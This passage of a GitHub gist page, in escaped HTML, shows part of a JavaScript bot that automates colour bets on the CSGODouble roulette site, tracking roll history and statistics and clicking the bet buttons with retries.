<\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L387\" class=\"blob-num js-line-number\" data-line-number=\"387\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC387\" class=\"blob-code blob-code-inner js-file-line\"> this.history = [];<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L388\" class=\"blob-num js-line-number\" data-line-number=\"388\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC388\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L389\" class=\"blob-num js-line-number\" data-line-number=\"389\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC389\" class=\"blob-code blob-code-inner js-file-line\"> for (var i = 0; i &lt; roll_history.childNodes.length; i++) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L390\" class=\"blob-num js-line-number\" data-line-number=\"390\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC390\" class=\"blob-code blob-code-inner js-file-line\"> var roll = parseInt(roll_history.childNodes[i].textContent);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L391\" class=\"blob-num js-line-number\" data-line-number=\"391\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC391\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L392\" class=\"blob-num js-line-number\" data-line-number=\"392\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC392\" class=\"blob-code blob-code-inner js-file-line\"> if (!isNaN(roll)) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L393\" class=\"blob-num js-line-number\" data-line-number=\"393\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC393\" class=\"blob-code blob-code-inner js-file-line\"> if (colors.green.indexOf(roll) !== -1) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L394\" class=\"blob-num js-line-number\" data-line-number=\"394\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC394\" class=\"blob-code blob-code-inner js-file-line\"> self.history.push(&#39;green&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L395\" class=\"blob-num js-line-number\" data-line-number=\"395\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC395\" class=\"blob-code blob-code-inner js-file-line\"> } else if (colors.red.indexOf(roll) !== -1) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L396\" class=\"blob-num js-line-number\" data-line-number=\"396\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC396\" class=\"blob-code blob-code-inner js-file-line\"> self.history.push(&#39;red&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L397\" class=\"blob-num js-line-number\" data-line-number=\"397\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC397\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L398\" class=\"blob-num js-line-number\" data-line-number=\"398\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC398\" class=\"blob-code blob-code-inner js-file-line\"> self.history.push(&#39;black&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L399\" class=\"blob-num js-line-number\" data-line-number=\"399\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC399\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L400\" class=\"blob-num js-line-number\" data-line-number=\"400\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC400\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L401\" class=\"blob-num js-line-number\" data-line-number=\"401\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC401\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L402\" class=\"blob-num js-line-number\" data-line-number=\"402\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC402\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L403\" class=\"blob-num js-line-number\" data-line-number=\"403\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC403\" class=\"blob-code blob-code-inner js-file-line\"> if (this.debug) { this.logdebug(&#39;History updated: &#39; + this.history.map(function(value) { return value; }).join(&#39;, &#39;)); }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L404\" class=\"blob-num js-line-number\" data-line-number=\"404\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC404\" class=\"blob-code blob-code-inner js-file-line\"> return this.history.length === 10;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L405\" class=\"blob-num js-line-number\" data-line-number=\"405\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC405\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L406\" class=\"blob-num js-line-number\" data-line-number=\"406\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC406\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L407\" class=\"blob-num js-line-number\" data-line-number=\"407\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC407\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.updateStats = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L408\" class=\"blob-num js-line-number\" data-line-number=\"408\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC408\" class=\"blob-code blob-code-inner js-file-line\"> this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L409\" class=\"blob-num js-line-number\" data-line-number=\"409\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC409\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.statistics.wins.innerHTML = this.stats.wins;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L410\" class=\"blob-num js-line-number\" data-line-number=\"410\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC410\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.statistics.loses.innerHTML = this.stats.loses;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L411\" class=\"blob-num js-line-number\" data-line-number=\"411\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC411\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.statistics.balance.innerHTML = this.stats.balance;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L412\" class=\"blob-num js-line-number\" data-line-number=\"412\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC412\" class=\"blob-code blob-code-inner js-file-line\"> return true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L413\" class=\"blob-num js-line-number\" data-line-number=\"413\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC413\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L414\" class=\"blob-num js-line-number\" data-line-number=\"414\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC414\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L415\" class=\"blob-num js-line-number\" data-line-number=\"415\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC415\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.updateAll = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L416\" class=\"blob-num js-line-number\" data-line-number=\"416\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC416\" class=\"blob-code blob-code-inner js-file-line\"> return this.updateBalance() &amp;&amp; this.updateHistory() &amp;&amp; this.updateStats();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L417\" class=\"blob-num js-line-number\" data-line-number=\"417\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC417\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L418\" class=\"blob-num js-line-number\" data-line-number=\"418\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC418\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L419\" class=\"blob-num js-line-number\" data-line-number=\"419\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC419\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.bet = function(amount, color) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L420\" class=\"blob-num js-line-number\" data-line-number=\"420\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC420\" class=\"blob-code blob-code-inner js-file-line\"> var self = this;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L421\" class=\"blob-num js-line-number\" data-line-number=\"421\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC421\" class=\"blob-code blob-code-inner js-file-line\"> color = color || this.color || this.default_color;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L422\" class=\"blob-num js-line-number\" data-line-number=\"422\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC422\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L423\" class=\"blob-num js-line-number\" data-line-number=\"423\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC423\" class=\"blob-code blob-code-inner js-file-line\"> if (color === &#39;rainbow&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L424\" class=\"blob-num js-line-number\" data-line-number=\"424\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC424\" class=\"blob-code blob-code-inner js-file-line\"> if (this.last_color) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L425\" class=\"blob-num js-line-number\" data-line-number=\"425\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC425\" class=\"blob-code blob-code-inner js-file-line\"> color = (this.last_color === &#39;red&#39; ? &#39;black&#39; : &#39;red&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L426\" class=\"blob-num js-line-number\" data-line-number=\"426\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC426\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L427\" class=\"blob-num js-line-number\" data-line-number=\"427\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC427\" class=\"blob-code blob-code-inner js-file-line\"> color = this.default_color;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L428\" class=\"blob-num js-line-number\" data-line-number=\"428\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC428\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L429\" class=\"blob-num js-line-number\" data-line-number=\"429\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC429\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L430\" class=\"blob-num js-line-number\" data-line-number=\"430\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC430\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L431\" class=\"blob-num js-line-number\" data-line-number=\"431\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC431\" class=\"blob-code blob-code-inner js-file-line\"> if ([&#39;green&#39;, &#39;red&#39;, &#39;black&#39;].indexOf(color) &lt; 0 || amount &gt; this.balance || amount &lt;= 0) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L432\" class=\"blob-num js-line-number\" data-line-number=\"432\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC432\" class=\"blob-code blob-code-inner js-file-line\"> this.log(&#39;Invalid bet!&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L433\" class=\"blob-num js-line-number\" data-line-number=\"433\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC433\" class=\"blob-code blob-code-inner js-file-line\"> this.last_result = &#39;invalid bet&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L434\" class=\"blob-num js-line-number\" data-line-number=\"434\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC434\" class=\"blob-code blob-code-inner js-file-line\"> this.waiting_for_bet = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L435\" class=\"blob-num js-line-number\" data-line-number=\"435\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC435\" class=\"blob-code blob-code-inner js-file-line\"> this.stop();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L436\" class=\"blob-num js-line-number\" data-line-number=\"436\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC436\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L437\" class=\"blob-num js-line-number\" data-line-number=\"437\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC437\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L438\" class=\"blob-num js-line-number\" data-line-number=\"438\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC438\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L439\" class=\"blob-num js-line-number\" data-line-number=\"439\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC439\" class=\"blob-code blob-code-inner js-file-line\"> if (this.balance - amount &lt; this.min_balance) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L440\" class=\"blob-num js-line-number\" data-line-number=\"440\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC440\" class=\"blob-code blob-code-inner js-file-line\"> this.log(&#39;Reached minimal balance!&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L441\" class=\"blob-num js-line-number\" data-line-number=\"441\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC441\" class=\"blob-code blob-code-inner js-file-line\"> this.last_result = &#39;reached min balance&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L442\" class=\"blob-num js-line-number\" data-line-number=\"442\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC442\" class=\"blob-code blob-code-inner js-file-line\"> if (this.stop_on_min_balance || this.balance - this.base_bet &lt; this.min_balance) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L443\" class=\"blob-num js-line-number\" data-line-number=\"443\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC443\" class=\"blob-code blob-code-inner js-file-line\"> this.stop();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L444\" class=\"blob-num js-line-number\" data-line-number=\"444\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC444\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L445\" class=\"blob-num js-line-number\" data-line-number=\"445\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC445\" class=\"blob-code blob-code-inner js-file-line\"> this.waiting_for_bet = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L446\" class=\"blob-num js-line-number\" data-line-number=\"446\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC446\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L447\" class=\"blob-num js-line-number\" data-line-number=\"447\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC447\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L448\" class=\"blob-num js-line-number\" data-line-number=\"448\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC448\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L449\" class=\"blob-num js-line-number\" data-line-number=\"449\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC449\" class=\"blob-code blob-code-inner js-file-line\"> bet_input.value = amount;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L450\" class=\"blob-num js-line-number\" data-line-number=\"450\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC450\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L451\" class=\"blob-num js-line-number\" data-line-number=\"451\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC451\" class=\"blob-code blob-code-inner js-file-line\"> if (!bet_buttons[color].disabled) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L452\" class=\"blob-num js-line-number\" data-line-number=\"452\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC452\" class=\"blob-code blob-code-inner js-file-line\"> var old_balance = self.balance;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L453\" class=\"blob-num js-line-number\" data-line-number=\"453\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC453\" class=\"blob-code blob-code-inner js-file-line\"> this.log(&#39;Betting &#39; + amount + &#39; on &#39; + color);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L454\" class=\"blob-num js-line-number\" data-line-number=\"454\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC454\" class=\"blob-code blob-code-inner js-file-line\"> if (!self.simulation) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L455\" class=\"blob-num js-line-number\" data-line-number=\"455\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC455\" class=\"blob-code blob-code-inner js-file-line\"> bet_buttons[color].click();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L456\" class=\"blob-num js-line-number\" data-line-number=\"456\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC456\" class=\"blob-code blob-code-inner js-file-line\"> var checker = setInterval(function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L457\" class=\"blob-num js-line-number\" data-line-number=\"457\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC457\" class=\"blob-code blob-code-inner js-file-line\"> if (!bet_buttons[color].disabled) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L458\" class=\"blob-num js-line-number\" data-line-number=\"458\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC458\" class=\"blob-code blob-code-inner js-file-line\"> clearInterval(checker);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L459\" class=\"blob-num js-line-number\" data-line-number=\"459\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC459\" class=\"blob-code blob-code-inner js-file-line\"> setTimeout(function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L460\" class=\"blob-num js-line-number\" data-line-number=\"460\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC460\" class=\"blob-code blob-code-inner js-file-line\"> if (self.updateBalance() &amp;&amp; self.balance === old_balance) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L461\" class=\"blob-num js-line-number\" data-line-number=\"461\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC461\" class=\"blob-code blob-code-inner js-file-line\"> if (!self.game) { return false; }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L462\" class=\"blob-num js-line-number\" data-line-number=\"462\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC462\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Bet rejected, retrying...&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L463\" class=\"blob-num js-line-number\" data-line-number=\"463\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC463\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(amount, color);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L464\" class=\"blob-num js-line-number\" data-line-number=\"464\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC464\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L465\" class=\"blob-num js-line-number\" data-line-number=\"465\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC465\" class=\"blob-code blob-code-inner js-file-line\"> if (self.debug) { self.logdebug(&#39;Bet accepted!&#39;); }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L466\" class=\"blob-num js-line-number\" data-line-number=\"466\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC466\" class=\"blob-code blob-code-inner js-file-line\"> self.last_bet = amount;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L467\" class=\"blob-num js-line-number\" data-line-number=\"467\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC467\" class=\"blob-code blob-code-inner js-file-line\"> self.bet_history.push(amount);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L468\" class=\"blob-num js-line-number\" data-line-number=\"468\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC468\" class=\"blob-code blob-code-inner js-file-line\"> self.last_color = color;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L469\" class=\"blob-num js-line-number\" data-line-number=\"469\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC469\" class=\"blob-code blob-code-inner js-file-line\"> self.waiting_for_bet = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L470\" class=\"blob-num js-line-number\" data-line-number=\"470\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC470\" class=\"blob-code blob-code-inner js-file-line\"> return true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L471\" class=\"blob-num js-line-number\" data-line-number=\"471\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC471\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L472\" class=\"blob-num js-line-number\" data-line-number=\"472\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC472\" class=\"blob-code blob-code-inner js-file-line\"> }, 2500);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L473\" class=\"blob-num js-line-number\" data-line-number=\"473\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC473\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L474\" class=\"blob-num js-line-number\" data-line-number=\"474\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC474\" class=\"blob-code blob-code-inner js-file-line\"> }, 1000);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L475\" class=\"blob-num js-line-number\" data-line-number=\"475\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC475\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L476\" class=\"blob-num js-line-number\" data-line-number=\"476\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC476\" class=\"blob-code blob-code-inner js-file-line\"> self.bet_history.push(amount);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L477\" class=\"blob-num js-line-number\" data-line-number=\"477\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC477\" class=\"blob-code blob-code-inner js-file-line\"> self.last_bet = amount;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L478\" class=\"blob-num js-line-number\" data-line-number=\"478\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC478\" class=\"blob-code blob-code-inner js-file-line\"> self.last_color = color;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L479\" class=\"blob-num js-line-number\" data-line-number=\"479\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC479\" class=\"blob-code blob-code-inner js-file-line\"> self.waiting_for_bet = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L480\" class=\"blob-num js-line-number\" data-line-number=\"480\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC480\" class=\"blob-code blob-code-inner js-file-line\"> return true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L481\" class=\"blob-num js-line-number\" data-line-number=\"481\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC481\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L482\" class=\"blob-num js-line-number\" data-line-number=\"482\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC482\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L483\" class=\"blob-num js-line-number\" data-line-number=\"483\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC483\" class=\"blob-code blob-code-inner js-file-line\"> if (!self.game) { return false; }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L484\" class=\"blob-num js-line-number\" data-line-number=\"484\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC484\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Button disabled, retrying...&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L485\" class=\"blob-num js-line-number\" data-line-number=\"485\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC485\" class=\"blob-code blob-code-inner js-file-line\"> setTimeout(function() { self.bet(amount, color) }, (Math.random() * 3 + 2).toFixed(3) * 1000);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L486\" class=\"blob-num js-line-number\" data-line-number=\"486\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC486\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L487\" class=\"blob-num js-line-number\" data-line-number=\"487\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC487\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L488\" class=\"blob-num js-line-number\" data-line-number=\"488\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC488\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L489\" class=\"blob-num js-line-number\" data-line-number=\"489\"><\/td>\n <td 